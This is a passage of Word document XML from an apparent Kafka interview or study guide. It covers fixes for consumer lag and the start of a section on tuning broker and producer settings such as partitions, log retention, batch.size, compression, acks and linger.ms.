    <w:p w14:paraId="0B39DF15" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Optimize Network Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that network bandwidth between the consumer and the Kafka broker is sufficient to handle the message volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462FE180" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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e. Monitor and Optimize Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EAC02B" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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cale Kafka Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the brokers are overloaded, add more brokers to distribute the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB1534" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Improve Disk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If disk I/O is a bottleneck on brokers, consider using faster disks (e.g., SSDs) or improving disk configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C92EBA" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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f. Ensure Proper Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512704F" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Rebalance Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that partitions are distributed evenly across consumers in the consumer group. Kafka’s default partition assignment strategy may result in unbalanced workloads, so consider using custom partition assignment strategies if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B5F44" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Increase Number of Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a few consumers are overloaded with many partitions, increase the number of partitions in your topic to spread the load more evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65328200" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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4. Consider Advanced Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB23315" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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If the lag issue is critical and persists despite basic fixes, consider the following advanced strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185E9ADA" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Backpressure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement custom backpressure mechanisms to prevent the consumer from being overwhelmed by a sudden surge of messages. You can control the message processing rate, pause consuming messages for a period, or buffer messages to handle spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00675818" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Implement Exactly-Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If data duplication or inconsistent results are contributing to lag, consider configuring Kafka for exactly-once semantics to ensure reliable message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB3B5B" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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5. Monitor and Validate the Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10D31A" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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After implementing the changes, monitor the system closely to ensure that consumer lag is reduced. Track metrics like lag, throughput, and processing time to validate whether the changes had the desired impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F4166" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Kafka Consumer Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use tools like Kafka Manager, Burrow, or Prometheus to monitor lag and consumer performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCD7DF" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Test in Production</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If possible, test in a production-like environment to validate the changes before deploying to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F25C7B" w14:textId="77777777" w:rsidR="008D4445"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B8F929">
          <v:rect id="_x0000_i3243" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD2A5B0" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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Summary of Steps to Troubleshoot Consumer Lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B23F6" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Identify the problem</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Check consumer lag using Kafka consumer group tools or monitoring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F51BB" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Investigate possible causes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Analyze consumer performance, configuration issues, resource constraints, broker performance, and partitioning issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF6A11" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Optimize consumer performance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355070A" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159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lastRenderedPageBreak/>
        <w:t>Improve processing logic and use batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBBD96" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159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Adjust Kafka consumer configurations like max.poll.records, fetch.min.bytes, and max.poll.interval.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4EAC0" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159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cale the consumer group and increase partitions if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE97A0" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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cale resources</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure adequate CPU, memory, and network resources for the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9BA0BB" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Monitor Kafka brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure brokers are properly scaled and optimized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971E3F9" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Use advanced techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement backpressure handling, custom partition assignment, and exactly-once semantics if required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5143B095" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Validate the fix</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the system after applying fixes to ensure that consumer lag is resolved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA17E6" w14:textId="77777777" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D444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By systematically diagnosing the cause of consumer lag and applying the appropriate fixes, you can significantly reduce or eliminate lag, ensuring efficient and timely processing of messages in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26256B2D" w14:textId="52D7BFCD"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65C607A">
          <v:rect id="_x0000_i3244" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D6E6D" w14:textId="2FE8902D" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D77D57" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="812" w:name="_Toc196308292"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you optimize Kafka performance in a production environment</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="812"/>
    </w:p>
    <w:p w14:paraId="606F3895" w14:textId="46E24DF2" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Optimizing Kafka performance in a production environment involves addressing several aspects of the system, including Kafka brokers, producers, consumers, hardware, and network configurations. The goal is to ensure that Kafka can handle high throughput, low latency, and fault tolerance while minimizing resource usage. Below are key strategies to optimize Kafka performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA8EA9"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1. Optimize Kafka Broker Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FBDC3" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Kafka brokers are the backbone of a Kafka cluster, and their configuration plays a critical role in performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FCFE9"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a. Adjust Replication Factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617F0F7" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Replication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The replication factor determines how many copies of a message are kept in the cluster. For higher availability, set a replication factor of at least 3, but keep in mind that it increases storage and network overhead. You may want to balance this based on the fault tolerance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F840CF8"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b. Optimize Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F26CBF" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Number of Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More partitions enable parallel processing and scaling, but too many partitions can cause overhead. Ensure that the number of partitions is optimal for your use case. A general rule of thumb is to have more partitions than consumers in the consumer group to allow for efficient parallel processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A42AF87" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Partition Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure even distribution of partitions across brokers to avoid uneven load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54CD93"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c. Tuning Log Segment Sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F39BA" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159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Log Segment Size</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The default size of log segments in Kafka is 1GB. For environments with high throughput, you might need to adjust the log.segment.bytes to a higher value (e.g., 5GB). Larger segment sizes result in fewer file opens/closures but can increase latency for log compaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23364653"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d. Configure Log Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434A901" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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Retention Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set appropriate log retention settings based on your use case. Time-based retention (log.retention.hours) or size-based retention (log.retention.bytes) can be adjusted to control how long messages are kept in Kafka before being deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234476D0" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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Log Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For topics that require key-based retention (such as when updating state), enable log compaction (log.cleanup.policy=compact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148ECF53"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e. Tune num.io.threads and num.network.threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B45AC0" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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I/O and Network Threads</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The number of I/O threads and network threads in Kafka can impact the broker's ability to handle incoming requests and disk I/O. Increase these values if Kafka brokers are handling a high number of requests or have high disk I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A490C" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="160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num.io.threads – Adjust to handle more disk I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA12E46" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="160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num.network.threads – Increase if Kafka is experiencing high network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78EFE6"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2. Optimize Kafka Producer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098146F" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Kafka producers are responsible for writing data to Kafka topics. The producer's configuration can significantly impact throughput, latency, and resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554C3E9"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a. Adjust Batch Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC9677" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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Batch Size</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase the batch.size parameter to batch messages before sending them to brokers. Larger batch sizes allow the producer to send data more efficiently. However, ensure that the batch size is not too large to avoid increased latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72551E61"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b. Buffer Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B768F" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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Buffer Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The buffer.memory setting determines how much memory the producer uses to buffer messages before sending them. Ensure that this value is large enough to allow for smooth buffering without running out of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09802797"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lastRenderedPageBreak/>
        <w:t>c. Enable Compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B84F4" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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ompression</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use compression techniques like snappy, gzip, or lz4 to reduce network and disk I/O. This can significantly lower the amount of data transmitted between producers and brokers and can improve throughput, especially for high-volume workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A847D9"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d. Acks Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD94D6A" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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acks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The acks setting controls how many broker acknowledgments the producer requires before considering a message successfully written. Setting acks=1 (acknowledged by the leader) is a common choice for good performance with a balance between reliability and speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B9F78" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="160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For higher durability, use acks=all (waits for all replicas to acknowledge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A18EC5"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e. Adjust Producer's linger.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEEDCAD" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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linger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This setting controls the time the producer waits to accumulate a batch of messages before sending them to Kafka. Increasing this value can allow the producer to batch messages more effectively, reducing the number of requests, but it increases latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7594D321"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3. Optimize Kafka Consumer Configuration</w:t>
      </w:r>
    </w:p>
